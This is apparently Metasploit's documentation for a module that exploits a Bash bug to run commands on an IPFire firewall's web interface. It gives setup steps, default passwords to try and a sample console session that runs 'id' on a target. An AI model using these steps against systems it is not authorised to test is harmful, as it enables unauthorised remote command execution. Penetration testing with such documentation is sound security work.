1.2 KiB
1.2 KiB
Vulnerable Application
Official Source: ipfire Archived Copy: github
Verification Steps
- Install the firewall
- Start msfconsole
- Do:
use exploit/linux/http/ipfire_bashbug_exec
- Do:
set rhost 10.10.10.10
- Do:
set PASSWORD admin
- Do:
set CMD ls
- Do:
run
- You should see the output of the command that was run.
Options
PASSWORD
Password is set at install. May be blank, 'admin', or 'ipfire'.
CMD
This is the command to run on the system.
Scenarios
Example of running the ID command
msf > use exploit/linux/http/ipfire_bashbug_exec
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
rhost => 192.168.2.202
msf exploit(ipfire_bashbug_exec) > set CMD id
CMD => id
msf exploit(ipfire_bashbug_exec) > exploit
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
[*] Exploit completed, but no session was created.